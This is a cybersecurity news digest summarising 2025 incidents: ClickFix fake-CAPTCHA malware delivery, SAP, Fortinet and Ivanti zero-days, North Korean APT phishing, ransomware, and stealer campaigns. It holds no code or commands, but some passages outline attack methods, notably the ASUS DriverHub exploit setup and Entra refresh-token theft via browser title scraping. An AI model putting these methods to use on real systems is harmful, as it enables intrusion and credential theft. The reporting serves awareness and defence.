CyberSecurity news
FlagThis
|
Lawrence Abrams@BleepingComputer
//
Compromised iClicker Site Used to Deliver Lumma Stealer - The iClicker website was compromised in a ClickFix attack using a fake CAPTCHA prompt, tricking users into installing Lumma Stealer malware.
ImgSrc: www.bleepstatic
iClicker, a widely-used student engagement platform, fell victim to a sophisticated ClickFix attack that compromised its website. The attack utilized a fake CAPTCHA prompt to deceive both students and instructors into unknowingly installing malware on their devices. This incident highlights the growing trend of cybercriminals exploiting user trust through social engineering tactics. iClicker, a subsidiary of Macmillan, serves approximately 5,000 instructors and 7 million students across numerous universities in the United States, making it a prime target for such malicious activities. The company has acknowledged the hijacking and issued a security bulletin advising affected users to take immediate action.
The ClickFix attack hinges on exploiting the familiarity users have with CAPTCHA verification processes. Instead of presenting a typical challenge to distinguish between humans and bots, the fake CAPTCHA prompts users to execute malicious scripts. This involves instructing users to open the Windows Run dialog, paste a provided script, and press Enter. Unbeknownst to the user, this action initiates a PowerShell script that retrieves and installs malware, granting attackers unauthorized access to their computer. The University of Michigan’s IT security team issued an early warning to students after discovering the malicious CAPTCHA. Sophos X-Ops revealed that the malware being installed through this method is the notorious Lumma Stealer. Lumma Stealer is a Malware-as-a-Service (MaaS) offering typically sold via Telegram channels, allowing cybercriminals to steal sensitive data, including browser passwords, cookies, cryptocurrency wallets, and session tokens. iClicker advised users who interacted with the false CAPTCHA between April 12-16 to run antivirus software and change their passwords immediately. The attack demonstrates the need for heightened cybersecurity awareness and vigilance when interacting with online prompts, even on trusted websites. Recommended read:
References :
info@thehackernews.com (The@The Hacker News
//
References:
fortiguard.fortinet.com
, The DefendOps Diaries
,
A critical vulnerability, CVE-2025-31324, affecting SAP NetWeaver is under active exploitation by China-linked Advanced Persistent Threat (APT) groups. This zero-day flaw, boasting a maximum CVSS score of 10.0, is an unauthenticated file upload vulnerability that grants attackers the ability to execute remote code on compromised systems. The vulnerability allows attackers to upload malicious files and gain unauthorized access, posing a significant threat to organizations relying on SAP systems and has led to breaches of critical systems worldwide.
Multiple Chinese hacking groups, including UNC5221, UNC5174, and CL-STA-0048, are leveraging CVE-2025-31324 to maintain persistent remote access, conduct reconnaissance, and deploy malicious programs. Attackers are exploiting this vulnerability to deploy web shells, maintain persistent access, and execute arbitrary commands on compromised systems. EclecticIQ researchers uncovered an exposed directory on attacker-controlled infrastructure, revealing that 581 SAP NetWeaver instances have already been compromised and backdoored with web shells. The targets of these attacks include critical infrastructure sectors globally, ranging from natural gas distribution networks and water management utilities to medical device manufacturing plants and government ministries. Organizations are urged to immediately apply the emergency patches released by SAP to mitigate the risk of exploitation. CISA has added CVE-2025-31324 to its Known Exploited Vulnerabilities Catalog, further emphasizing the urgency for organizations to address this critical flaw to protect their systems and data from potential compromise. Recommended read:
References :
@securityonline.info
//
North Korean APT Konni Targets Ukrainian Government - North Korean APT Konni targets Ukrainian government entities using phishing campaigns to gather intelligence on the Russia-Ukraine conflict.
ImgSrc: securityonline.
North Korean state-sponsored threat group Konni, also known as Opal Sleet or TA406, has been observed actively targeting Ukrainian government entities in cyber espionage campaigns. These operations focus on gathering strategic intelligence related to the ongoing conflict between Russia and Ukraine. The group utilizes phishing campaigns to collect information on the trajectory of the Russian invasion, indicating North Korea's sustained interest in the geopolitical dynamics and its willingness to leverage cyber capabilities for strategic advantage.
TA406's cyber espionage activities involve sophisticated social engineering tactics, often impersonating fictitious think tanks, such as the "Royal Institute of Strategic Studies." These phishing emails are laced with lure content relevant to current Ukrainian political events, particularly those surrounding former military leader Valeriy Zaluzhnyi. The attackers use password-protected RAR files hosted on MEGA, containing .CHM files with embedded PowerShell scripts, or HTML files and LNK shortcuts to initiate the infection. Once a target is compromised, PowerShell scripts are executed to gather extensive system information, including network configurations, system details, and WMI queries. This collected data is then Base64-encoded and transmitted to external servers, enabling the attackers to gain a comprehensive understanding of the targeted systems. The group employs various persistence mechanisms, such as installing batch files as autorun files and utilizing scheduled tasks to ensure continued access to compromised machines. Recommended read:
References :
Bill Toulas@BleepingComputer
//
References:
linuxsecurity.com
, The DefendOps Diaries
,
A new cyber espionage campaign dubbed "ClickFix" is actively targeting Linux systems, marking a concerning shift in focus for threat actors. This campaign, characterized by its precision and stealth, is not a generic, scattershot attack, but rather a calculated effort by groups like APT36, known for their cyberespionage capabilities. Attackers are exploiting vulnerabilities within Linux environments, highlighting the increasing sophistication and reliance on Linux by critical infrastructure and enterprises worldwide. The rise of ClickFix attacks serves as a wake-up call, demonstrating that attackers are now willing to go deeper and target smarter, making it harder for administrators who may have previously felt secure with standard hardening measures.
The core technique of ClickFix attacks involves social engineering to deceive users into executing malicious commands. Attackers have utilized websites that mimic legitimate entities, such as India’s Ministry of Defence, to lure victims. When users visit these sites, they are profiled based on their operating system and redirected to a tailored attack flow. On Linux, this often involves presenting a CAPTCHA page that, when interacted with, copies a shell command to the user’s clipboard. The user is then instructed to execute this command, which can lead to the installation of malware. The command used in these attacks drops a payload on the target system, which, in its current form, fetches a JPEG image from the attacker’s server. APT36 is reportedly linked to Pakistan and has been known to use sophisticated social engineering tactics to target Indian entities. Historically, APT36 primarily targeted Windows-based environments, but the ClickFix campaign signals a significant evolution in their strategy. This group focuses heavily on espionage, collecting information from government agencies, academic institutions, and defense sectors. What distinguishes APT36 from other advanced persistent threats is its knack for exploiting tools and techniques that leave systems vulnerable without raising immediate alarms. The cross-platform nature of ClickFix attacks, which now include Linux, highlights their versatility and the need for robust defensive measures. Recommended read:
References :
Pierluigi Paganini@Security Affairs
//
Moldovan law enforcement, in collaboration with Dutch authorities, have apprehended a 45-year-old foreign man suspected of orchestrating a series of ransomware attacks targeting Dutch companies in 2021. The suspect is wanted internationally for a range of cybercrimes, including ransomware attacks, blackmail, and money laundering. This arrest marks a significant step in the fight against cybercrime, particularly concerning the persistent threat posed by DoppelPaymer ransomware. The operation involved a coordinated effort between Moldovan prosecutors, the country's Center for Combating Cybercrimes, and law enforcement from the Netherlands, highlighting the importance of international cooperation in tackling sophisticated cyber threats.
The suspect's alleged involvement includes a ransomware attack on the Netherlands Organization for Scientific Research (NWO), resulting in estimated damages of €4.5 million. During the arrest on May 6, Moldovan police searched the suspect's residence and car, seizing substantial evidence, including over €84,000 in cash, an electronic wallet, two laptops, a mobile phone, a tablet, six bank cards, two data storage devices, and six memory cards. The suspect is currently in custody, and extradition procedures to the Netherlands are underway, where he will face charges related to his alleged cybercrimes. The DoppelPaymer ransomware group emerged in 2019, known for its sophisticated tactics, including data exfiltration before encryption, to pressure victims into paying ransoms. The group has targeted various sectors globally and evolved into other ransomware variants, showcasing the challenges in combating this type of cyber threat. The arrest in Moldova underscores the ongoing efforts by law enforcement to pursue and bring cybercriminals to justice, reinforcing the message that cybercrime will not go unpunished. Recommended read:
References :
@www.helpnetsecurity.com
//
CISA has added five actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. This action follows Microsoft's May 2025 Patch Tuesday, which addressed a total of 72 vulnerabilities, including these five zero-day exploits. The vulnerabilities affect various Windows components, posing a significant risk to systems if left unpatched. The addition to the KEV catalog underscores the urgency for organizations to apply the relevant Microsoft patches.
The zero-day vulnerabilities include CVE-2025-30397, CVE-2025-30400, CVE-2025-32701, CVE-2025-32706, and CVE-2025-32709. CVE-2025-30397 is a memory corruption vulnerability in the Windows scripting engine, while CVE-2025-30400 affects the Microsoft DWM Core Library. CVE-2025-32701 and CVE-2025-32706 are defects in the Windows Common Log File System (CLFS) Driver, which are particularly concerning as they can lead to elevation of privilege to SYSTEM. CVE-2025-32709 resides in the Windows Ancillary Function Driver for WinSock. Security experts recommend immediate patching, especially for the CLFS driver vulnerabilities. Mike Walters of Action1 warned that attackers could exploit the CLFS zero-days to gain full control of systems, allowing them to run arbitrary code, install malware, modify data, or disable security protections. The Cybersecurity and Infrastructure Security Agency (CISA) encourages all organizations to review and apply the necessary updates to mitigate the risk of exploitation. Recommended read:
References :
Zeljka Zorz@Help Net Security
//
Fortinet is addressing a critical zero-day vulnerability, CVE-2025-32756, that has been actively exploited to compromise FortiVoice enterprise phone systems. The vulnerability is a stack-based buffer overflow, allowing unauthenticated remote attackers to execute arbitrary code or commands by sending a specially crafted HTTP request. Fortinet has released security updates to patch this remote code execution vulnerability, urging users to upgrade to fixed releases for affected solutions, which include FortiMail, FortiNDR, FortiRecorder, and FortiCamera, although attackers are primarily targeting FortiVoice installations.
Fortinet's Product Security Team discovered CVE-2025-32756 based on attackers' activity, including network scans, erasing system crashlogs, enabling "fcgi debugging" to log credentials, and dropping malware. The company has shared indicators of compromise (IOCs), such as IP addresses used by attackers, log entries, added or modified files, and modified settings. These IOCs help users detect and respond to potential breaches. Fortinet’s swift response to this exploit involved releasing security patches and providing mitigation strategies to protect their customers. For FortiVoice installations that cannot be immediately upgraded, Fortinet recommends disabling the system’s HTTP/HTTPS administrative interface as a temporary workaround. The broader issue, ZDI-25-288, involves a directory traversal remote code execution vulnerability within FortiWeb. Discovered by Kentaro Kawane of GMO Cybersecurity by Ierae, this flaw allows remote attackers to execute arbitrary code on affected FortiWeb installations, requiring authentication. Fortinet has issued an update to correct this vulnerability, emphasizing the company's commitment to addressing security flaws promptly. Recommended read:
References :
@ComputerWeekly.com
//
Marks & Spencer (M&S) has confirmed that customer data was stolen during a recent cyberattack, with the ransomware group DragonForce claiming responsibility. The retail giant has initiated a mandatory password reset for all customers as a precautionary measure following the breach. The attack, which has shaken the UK retail sector, also affected other major retailers including the Co-operative Group (Co-op) and Harrods.
The stolen data includes customer names, dates of birth, home and email addresses, phone numbers, household information, and online order histories. However, M&S assures customers that the compromised information does not include usable card or payment details, or account passwords. The company is working with external experts to secure its systems and has reported the incident to the relevant government authorities and law enforcement agencies. Initially reports linked Scattered Spider to the attack, it has now been claimed that DragonForce are responsible. DragonForce, a relatively new Ransomware-as-a-Service (RaaS) group, has emerged as a significant threat, initially framing itself as a pro-Palestinian hacktivist collective before shifting to profit-driven operations. They operate by leasing their ransomware to affiliates, who then carry out the attacks, with the developers taking a cut of the ransom payments. DragonForce has been targeting high-profile UK retailers, deploying ransomware to encrypt networks, disrupt online orders and payment systems, and threaten the public release of stolen data. Recommended read:
References :
@community.tenable.com
//
Ivanti is urging customers to immediately update their Endpoint Manager Mobile (EPMM) software after the discovery and active exploitation of two critical vulnerabilities, CVE-2025-4427 and CVE-2025-4428. The vulnerabilities reside within open-source libraries integrated into EPMM and can be chained together by attackers to achieve unauthenticated remote code execution on affected devices. This means malicious actors could potentially gain complete control over vulnerable systems without needing any login credentials. Ivanti has released security updates to address these flaws and strongly recommends that users apply these patches as soon as possible, especially for internet-facing devices.
The first vulnerability, CVE-2025-4427, is an authentication bypass flaw present in the API component of Ivanti EPMM. This flaw allows attackers to bypass security measures and gain unauthorized access to protected resources. The second, CVE-2025-4428, is a remote code execution vulnerability that allows attackers to execute arbitrary code on the target system. By chaining these vulnerabilities, a threat actor could potentially bypass authentication and then execute malicious code, leading to a full system compromise. CERT-EU has also flagged these vulnerabilities, indicating potential exploitation within European Union institutions. Ivanti has released patched versions of EPMM to remediate the vulnerabilities (versions 11.12.0.5, 12.3.0.2, 12.4.0.2, and 12.5.0.1). For those unable to apply the updates immediately, Ivanti recommends filtering access to the API using built-in Portal ACLs or an external Web Application Firewall (WAF) as a temporary mitigation. Furthermore, an RPM file containing a hot-fix mitigation is available through Ivanti Support. These vulnerabilities specifically affect the on-premises version of Ivanti EPMM and do not impact cloud-based services like Ivanti Neurons for MDM or Ivanti Sentry. Recommended read:
References :
@securityonline.info
//
The North Korean threat actor WaterPlum, also known as Famous Chollima or PurpleBravo, is behind the latest iteration of the OtterCookie malware, version 4. This cross-platform malware is designed to target financial institutions, cryptocurrency platforms, and FinTech companies across the globe. OtterCookie's evolution demonstrates a significant advancement in its capabilities, posing an increased threat level. The malware is often deployed through the "Contagious Interview" campaign, which uses fake job offers to entice victims into opening malicious payloads.
OtterCookie v4 boasts enhanced credential theft capabilities, with modules specifically designed to steal credentials from Google Chrome, MetaMask, and iCloud Keychain. One module decrypts and extracts passwords from Chrome using the Windows Data Protection API (DPAPI), while another targets the MetaMask extension in browsers like Chrome and Brave, as well as iCloud Keychain, to harvest sensitive data. These stolen credentials are then stored in a local database before being exfiltrated. These advancements represent a significant leap from earlier versions of OtterCookie which primarily functioned as a file grabber. A key feature of OtterCookie v4 is its ability to detect virtual machine environments, including VMware, VirtualBox, Microsoft Hyper-V, and QEMU. This allows the malware to evade analysis and detection by security researchers and automated sandbox environments. The malware's cross-platform functionality allows it to operate across Windows, macOS, and Linux, significantly broadening its potential impact. Researchers first exposed OtterCookie in December 2024, and the malware has rapidly evolved since then, with version 3 appearing in February 2025 and version 4 in April 2025. Recommended read:
References :
@securebulletin.com
//
References:
securebulletin.com
, securityonline.info
,
A new multi-platform malware campaign is targeting organizations in Southern Europe, specifically Spain, Italy, and Portugal, through sophisticated phishing emails. This campaign leverages weaponized PDF invoices to deliver a Java-based Remote Access Trojan (RAT) known as RATty. The attack begins with emails that bypass SPF/DKIM checks by abusing Spain's serviciodecorreo.es email service, allowing forged sender addresses to appear legitimate. The emails contain a PDF attachment mimicking an invoice from Medinova Health Group, enticing recipients to click a Dropbox link.
This link redirects victims to an HTML file (Fattura.html) that initiates a multi-stage verification process, including a fake CAPTCHA, to further deceive the user. The HTML file then utilizes Ngrok tunneling to dynamically switch content based on the victim's geolocation. If the request originates from Italy, the user is redirected to MediaFire to download a malicious Java Archive (JAR) file named FA-43-03-2025.jar. Users outside of Italy are redirected to benign Google Drive documents, effectively bypassing automated sandboxes typically hosted in cloud regions outside Italy. The final JAR file contains the RATty malware, a cross-platform Remote Access Trojan that exploits Java's capabilities to grant attackers extensive control over the compromised system. This includes remote command execution, keystroke logging, screenshot capture, and data exfiltration. The attackers may also repackage RATty in MSI installers, further disguising the threat as a software update to increase the odds of user execution. Organizations are advised to update endpoint protection tools to defend against this evolving phishing tactic. Recommended read:
References :
@cyberpress.org
//
References:
cyberpress.org
, www.genians.co.kr
The North Korea-linked threat group APT37 has been identified as the perpetrator of a sophisticated spear phishing campaign targeting activists and organizations focused on North Korean affairs. Genians Security Center researchers analyzed the campaign, dubbed "Operation: ToyBox Story," which involved the use of fake academic forum invites from a South Korean national security think tank to lure victims. The attackers leveraged Dropbox to deliver malicious LNK files, demonstrating an evolution in their attack methodology.
The spear phishing emails were cleverly disguised as invitations and information from a legitimate South Korean national security think tank, referencing real-world events such as "Trump 2.0 Era: Prospects and South Korea’s Response" to enhance credibility. These emails contained Dropbox links leading to compressed ZIP archives, which, upon extraction, harbored malicious shortcut (LNK) files. When a user opens the malicious LNK file, it initiates a multi-stage malware loader chain. The campaign highlighted APT37's ongoing use of trusted cloud platforms like Dropbox as command and control (C2) infrastructure, a tactic known as "Living off Trusted Sites" (LoTS). This approach allows the attackers to blend malicious traffic with legitimate cloud service activity, complicating detection and response efforts. The malicious LNK files are designed to execute hidden PowerShell commands, which deploy a decoy document while simultaneously creating hidden files and ultimately injecting shellcode directly into memory to install a variant of the RoKRAT malware family. RoKRAT collects system information and allows for further exploitation of the victim's system. Recommended read:
References :
Sead Fadilpašić@techradar.com
//
ASUS DriverHub Vulnerabilities Expose Users to RCE - Critical security flaws were discovered in ASUS DriverHub, allowing remote code execution, emphasizing the need for immediate updates.
ImgSrc: cdn.mos.cms.fut
ASUS DriverHub, a driver management utility designed to simplify updates by automatically detecting motherboard models, is facing scrutiny following the discovery of critical security flaws. Cybersecurity researchers identified vulnerabilities, designated as CVE-2025-3462 and CVE-2025-3463, that could allow malicious actors to remotely execute code on systems with the software installed. These flaws stem from insufficient HTTP request validation, potentially enabling unauthorized remote interactions with the software and the ability for malicious sites to execute commands with administrative rights.
Researchers discovered a one-click remote code execution vulnerability in ASUS's pre-installed DriverHub software. The attack vector involves tricking users into visiting a malicious subdomain of driverhub.asus[.]com. By leveraging the DriverHub's UpdateApp endpoint, attackers can execute a legitimate version of "AsusSetup.exe" with modified parameters that enable the execution of arbitrary files hosted on the attacker's domain. This exploit requires the creation of a malicious domain hosting three files: the payload, a modified AsusSetup.ini with a "SilentInstallRun" property pointing to the payload, and the legitimate AsusSetup.exe. ASUS has released an update, version 1.0.6.0 or newer, to address these vulnerabilities and urges users to update immediately. The update includes important security fixes to mitigate the risk of remote code execution. Users are advised to open the ASUS DriverHub utility and click the "Update Now" button to complete the patching process. While there are no confirmed cases of active exploitation in the wild, a proof of concept exploit exists, highlighting the potential danger, especially for sectors relying heavily on ASUS motherboards. Recommended read:
References :
@blog.checkpoint.com
//
References:
Check Point Blog
, Kaspersky official blog
,
Ransomware attacks have surged in 2025, evolving into more sophisticated and dangerous threats than ever before. What started as simple file encryption schemes has morphed into full-blown extortion ecosystems. These modern attacks now involve data exfiltration, public shaming of victims, and even DDoS attacks, marking a significant escalation in cybercriminal tactics. According to Check Point Research, the first quarter of 2025 saw a record-breaking 2,289 victims published on data leak sites, representing a staggering 126% year-over-year increase, demonstrating the growing threat volume and the evolving tactics employed by attackers.
The rise of Ransomware-as-a-Service (RaaS) has also significantly contributed to the increased threat landscape. Check Point's 2024 Annual Ransomware Report revealed that 46 new ransomware groups emerged in that year alone, a 48% increase compared to the previous year. These groups offer ready-made ransomware kits, lowering the barrier to entry for cybercriminals and enabling a wider range of actors to launch attacks. Experts are particularly concerned about the potential for "triple extortion" models, which combine DDoS attacks, public leak threats, and direct harassment of customers or partners to pressure victims into paying ransoms. In addition to the increasing sophistication of ransomware itself, cybercriminals are also abusing legitimate tools to blend in with compromised environments. The Cactus ransomware gang, for example, has been known to direct victims to initiate Microsoft Quick Assist remote access sessions, even assisting them with the installation of the program. With Anti-Ransomware Day being on May 12, organizations are urged to prioritize proactive defenses, incident response planning, and employee awareness training to mitigate the growing risk of ransomware attacks in 2025 and beyond. Recommended read:
References :
@cyberinsider.com
//
References:
cyberinsider.com
Recent reports highlight a surge in the exploitation of critical software vulnerabilities across various platforms. These vulnerabilities, affecting both widely used software like Microsoft products and open-source tools such as the Linux kernel, pose significant risks to system security. A particularly concerning flaw has been identified in ASUS DriverHub, potentially allowing remote code execution with administrative privileges. This highlights the persistent challenge of maintaining secure software ecosystems and the importance of vigilant monitoring and rapid patching.
The vulnerabilities span a range of severity levels, with some enabling privilege escalation and remote code execution, as demonstrated by the ASUS DriverHub flaw. Cyble has issued weekly vulnerability reports, emphasizing the presence of zero-day vulnerabilities and active exploits targeting popular IT products. Specific details include Commvault updating its advisory for a critical Commvault Command Center Vulnerability (CVE-2025-34028) and Ubuntu releasing a security notice (USN-7506-3) addressing multiple vulnerabilities within the Linux kernel (FIPS). These instances underscore the need for comprehensive vulnerability management strategies for both enterprises and individual users. Security experts emphasize the critical role of timely patching and robust vulnerability management practices in mitigating these risks. For example, Arctic Wolf noted that updating to Commvault versions 11.38.20 or 11.38.25 alone is insufficient to fully address the CVE-2025-34028 vulnerability. Ubuntu users are advised to perform a standard system update followed by a reboot to apply the necessary Linux kernel fixes, while also being aware of the need to recompile and reinstall third-party kernel modules due to an unavoidable ABI change. Organizations are urged to implement proactive security measures, including continuous monitoring, vulnerability scanning, and rapid deployment of security patches to protect their systems from exploitation. Recommended read:
References :
@cyberpress.org
//
Mitel SIP Phone Vulnerabilities Allow Command Injection - Critical vulnerabilities have been discovered in Mitel SIP phones, allowing attackers to execute arbitrary commands and upload malicious files.
ImgSrc: blogger.googleu
Critical security vulnerabilities have been discovered in Mitel SIP phones, potentially exposing enterprise communication systems to unauthorized access and control. The flaws impact widely deployed models, including the 6800, 6900, and 6900w Series, as well as the 6970 Conference Unit. These vulnerabilities include a command injection flaw (CVE-2025-47188) and an unauthenticated file upload vulnerability (CVE-2025-47187). Mitel has issued a security advisory, MISA-2025-0004, urging users to update their devices immediately.
Mitel's critical command injection vulnerability (CVE-2025-47188) allows unauthenticated attackers with network access to execute arbitrary commands on affected phones. The flaw stems from insufficient sanitization of parameters within the device’s web management interface. With a CVSS score of 9.8, exploitation of this vulnerability could grant attackers control over the device, enabling them to exfiltrate sensitive data, alter system settings, and disrupt operations. This could also allow attackers to use the compromised device as a foothold to pivot deeper into enterprise networks. The affected devices are Mitel 6800, 6900, and 6900w Series SIP Phones, and the 6970 Conference Unit running firmware version R6.4.0.SP4 or earlier. Mitel recommends upgrading to firmware version R6.4.0.SP5 or newer releases to mitigate these risks. While Mitel suggests keeping SIP phones on protected internal networks, organizations with expansive and poorly segmented networks remain at heightened risk. Recommended read:
References :
@www.webroot.com
//
References:
www.eweek.com
, www.webroot.com
Cybercriminals are increasingly using sophisticated tactics to deceive individuals and steal sensitive information. One common method involves sending fraudulent text messages, known as smishing, that impersonate legitimate businesses like delivery services or banks. These scams often entice victims to click on malicious links, leading to identity theft, financial loss, or the installation of malware. Webroot emphasizes mobile security, particularly protecting phones from text scams with potential identity theft and malware planting. The Federal Trade Commission reported that consumers lost $470 million to scams initiated through text messages in 2024.
Google is intensifying its efforts to combat these online threats by integrating artificial intelligence across its various platforms. The company is leveraging AI in Search, Chrome, and Android to identify and block scam attempts more effectively. Google's AI-powered defenses are capable of detecting 20 times more scam pages than before, significantly improving the quality of search results. Furthermore, AI is used to identify fraudulent websites, app notifications, calls, and direct messages, helping to safeguard users from various scam tactics. A key component of Google's enhanced protection is the integration of Gemini Nano, a lightweight, on-device AI model, into Chrome. This allows for instant identification of scams, even those that haven't been previously encountered. When a user navigates to a potentially dangerous page, Chrome evaluates the page using Gemini Nano, which extracts security signals to determine the intent of the page. This information is then sent to Safe Browsing for a final verdict, adding an extra layer of protection against evolving online threats. Recommended read:
References :
@cyberpress.org
//
A new method has emerged for stealing Microsoft Entra refresh tokens using Beacon Command & Control (C2) frameworks. This novel technique leverages browser-based authorization flows and Windows API functions to bypass traditional detection mechanisms, allowing attackers to maintain persistent access to cloud resources, even on devices not joined to a domain. The exploit utilizes Beacon Object Files (BOFs) to extract Entra tokens from compromised endpoints, posing a significant risk to enterprise cloud environments. By exploiting the OAuth 2.0 authorization code flow with modifications for offensive operations, attackers can initiate a hidden browser session and scrape the authorization code from the browser window title using the GetWindowTextA Win32 API.
The attack method capitalizes on First-Party Client IDs (FOCI) such as Microsoft Teams, allowing access to multiple Microsoft services through "family refresh tokens." This provides operational advantages by blending token requests with legitimate user activity as they originate from the compromised host's IP address. Furthermore, it is compatible with Bring Your Own Device (BYOD) scenarios, where traditional Primary Refresh Token (PRT) extraction methods fail. After acquiring refresh tokens, attackers can conduct AzureAD reconnaissance via tools like ROADrecon. A separate but related flaw in Microsoft Entra ID's legacy login process has also been exploited to bypass MFA and Conditional Access, targeting admin accounts across various sectors including finance, healthcare, manufacturing, and technology. This vulnerability resides in the Basic Authentication Version 2 – Resource Owner Password Credential (BAV2ROPC), a legacy login method that allows authentication using simple usernames and passwords. The attacks, which occurred between March 18 and April 7, 2025, demonstrate the dangers of outdated authentication protocols in cloud environments, highlighting how attackers can circumvent modern protections by exploiting compatibility features within Entra ID. Recommended read:
References :
@cyberalerts.io
//
A new malware campaign is exploiting the hype surrounding artificial intelligence to distribute the Noodlophile Stealer, an information-stealing malware. Morphisec researcher Shmuel Uzan discovered that attackers are enticing victims with fake AI video generation tools advertised on social media platforms, particularly Facebook. These platforms masquerade as legitimate AI services for creating videos, logos, images, and even websites, attracting users eager to leverage AI for content creation.
Posts promoting these fake AI tools have garnered significant attention, with some reaching over 62,000 views. Users who click on the advertised links are directed to bogus websites, such as one impersonating CapCut AI, where they are prompted to upload images or videos. Instead of receiving the promised AI-generated content, users are tricked into downloading a malicious ZIP archive named "VideoDreamAI.zip," which contains an executable file designed to initiate the infection chain. The "Video Dream MachineAI.mp4.exe" file within the archive launches a legitimate binary associated with ByteDance's CapCut video editor, which is then used to execute a .NET-based loader. This loader, in turn, retrieves a Python payload from a remote server, ultimately leading to the deployment of the Noodlophile Stealer. This malware is capable of harvesting browser credentials, cryptocurrency wallet information, and other sensitive data. In some instances, the stealer is bundled with a remote access trojan like XWorm, enabling attackers to gain entrenched access to infected systems. Recommended read:
References :
@cyberpress.org
//
A joint investigation by SentinelLABS and Validin has exposed a massive cryptocurrency phishing operation named "FreeDrain." This industrial-scale network has been siphoning digital assets for years by exploiting weaknesses in free publishing platforms. FreeDrain utilizes aggressive SEO manipulation, free-tier web services like gitbook.io, webflow.io, and github.io, along with sophisticated layered redirection techniques to lure unsuspecting victims. The operation's primary goal is to steal cryptocurrency wallet login credentials and seed phrases, often resulting in rapid fund exfiltration.
FreeDrain operators achieve high search engine rankings by creating over 38,000 malicious subdomains on trusted platforms, including Amazon S3 and Azure Web Apps. These subdomains host lure pages that often feature AI-generated content and screenshots of legitimate wallet interfaces. When users search for wallet-related queries, they are redirected through comment-spammed URLs and custom redirector domains to highly convincing phishing clones. These phishing pages frequently include live chat widgets manned by real human operators who encourage victims to submit their credentials. Researchers believe the operators are based in the UTC+05:30 timezone (Indian Standard Time) and work standard weekday hours. The sophistication of FreeDrain lies in its scale, automation, and ability to avoid traditional phishing email delivery vectors. Victims are funneled from benign-seeming search queries directly to malicious pages ranked at the top of major search engines. Validin first became aware of FreeDrain on May 12, 2024, after a victim reported losing approximately 8 BTC (around $500,000 at the time) to a phishing site. Recommended read:
References :
@cyble.com
//
More than 40 hacktivist groups have launched a coordinated cyber campaign against India following a terror attack in Pahalgam, Jammu and Kashmir, on April 22. The cyberattacks are a reflection of the ongoing tensions between India and Pakistan, particularly concerning the Kashmir region. These hacktivist groups, united under the banner of #OpIndia, are targeting key Indian government portals, healthcare infrastructure, and cyber defense agencies.
The coordinated cyber campaign involves various types of attacks, including website defacements and Denial-of-Service (DoS) attacks aimed at disrupting services. Hacktivist groups have also claimed data breaches. The attacks reflect a familiar pattern where cyber activity escalates during times of real-world tension between India and Pakistan, with hacktivist groups from both sides launching attacks in response to events on the ground. The cyber retaliation between India and Pakistan is not new, with digital skirmishes becoming more frequent during political or military flare-ups. Over the years, cyber activity related to India has grown, including hacktivist campaigns, data leaks, and the sale of stolen information on the Dark Web. While some incidents are low impact or symbolic, they often align with events on the ground, demonstrating how the conflict now extends into cyberspace. Recommended read:
References :
@arcticwolf.com
//
References:
Arctic Wolf
, malware.news
Commvault has issued updated advisories regarding a critical vulnerability, CVE-2025-34028, affecting Commvault Command Center. The flaw allows for remote code execution, posing a significant risk to organizations utilizing the platform. Initial patches were released, but Commvault has since clarified that simply being on versions 11.38.20 or 11.38.25 is not enough to fully remediate the vulnerability. Specific updates within those versions are required to effectively address the security gap, an update which was clarified on May 7, 2025.
The Cybersecurity and Infrastructure Security Agency (CISA) has added the Commvault Command Center vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. This designation underscores the severity of the flaw and the potential for active exploitation, prompting immediate action from organizations to apply the necessary updates. Fortunately, Commvault seems to have resolved the issue where the "Upgrade software" option was not working for unregistered systems. It is now possible to obtain the necessary fixes for CVE-2025-34028 by clicking "Upgrade now," even without being registered with Commvault. However, the "Check updates" button in the "Download or copy software" section is still malfunctioning. It incorrectly reports systems as "Up-to-date" even when they are not fully patched against CVE-2025-34028. Users must ensure they have the appropriate specific updates within versions 11.38.20 or 11.38.25 as mentioned in Commvault's clarified advisory to achieve full remediation. Staying vigilant, monitoring security advisories, and diligently applying patches and updates are crucial for maintaining a robust security posture and mitigating potential cyber threats. Recommended read:
References :
Dissent@DataBreaches.Net
//
Pearson, the global education and publishing giant, has confirmed it suffered a cyberattack resulting in the theft of corporate data and customer information. The breach was discovered by BleepingComputer, who reported that the attackers gained unauthorized access to Pearson's systems. Pearson, a UK-based company, is a major player in academic publishing, digital learning tools, and standardized assessments, serving schools, universities, and individuals across over 70 countries.
Pearson stated that after discovering the unauthorized access, they acted to stop the breach, investigate the incident, and ascertain what data was affected with forensics experts. They also supported law enforcements investigation. Furthermore, Pearson said they've taken steps to deploy additional security measures onto their systems, including enhanced security monitoring and authentication. BleepingComputer was tipped off that someone used an exposed GitLab Personal Access token to compromise Pearson’s development environment in January 2025. The token was found in a public .git/config file, with the attackers using this access to find even more login credentials, hardcoded in the source code, which they then used to infiltrate the company’s network and steal corporate and customer information. The company downplayed the significance of the breach, suggesting the stolen data was largely outdated, referring to it as "legacy data." Pearson has not disclosed the number of individuals affected, nor the specific types of information exposed. There was no employee information among the stolen files, it was confirmed. Recommended read:
References :
@owaspai.org
//
References:
OWASP
, Bernard Marr
The Open Worldwide Application Security Project (OWASP) is actively shaping the future of AI regulation through its AI Exchange project. This initiative fosters collaboration between the global security community and formal standardization bodies, driving the creation of AI security standards designed to protect individuals and businesses while encouraging innovation. By establishing a formal liaison with international standardization organizations like CEN/CENELEC, OWASP is enabling its vast network of security professionals to directly contribute to the development of these crucial standards, ensuring they are practical, fair, and effective.
OWASP's influence is already evident in the development of key AI security standards, notably impacting the AI Act, a European Commission initiative. Through the contributions of experts like Rob van der Veer, who founded the OWASP AI Exchange, the project has provided significant input to ISO/IEC 27090, the global standard on AI security guidance. The OWASP AI Exchange serves as an open-source platform where experts collaborate to shape these global standards, ensuring a balance between strong security measures and the flexibility needed to support ongoing innovation. The OWASP AI Exchange provides over 200 pages of practical advice and references on protecting AI and data-centric systems from threats. This resource serves as a bookmark for professionals and actively contributes to international standards, demonstrating the consensus on AI security and privacy through collaboration with key institutes and Standards Development Organizations (SDOs). The foundation of OWASP's approach lies in risk-based thinking, tailoring security measures to specific contexts rather than relying on a one-size-fits-all checklist, addressing the critical need for clear guidance and effective regulation in the rapidly evolving landscape of AI security. Recommended read:
References :
@securityonline.info
//
Microsoft has recently addressed several critical security vulnerabilities affecting its Azure cloud services and Microsoft Power Apps. The flaws, identified in Azure Automation, Azure Storage, Azure DevOps, and Microsoft Power Apps, highlighted the importance of proactive security measures within cloud-native development environments. One vulnerability, CVE-2025-29813, received the maximum Common Vulnerability Scoring System (CVSS) score of 10, indicating its severity.
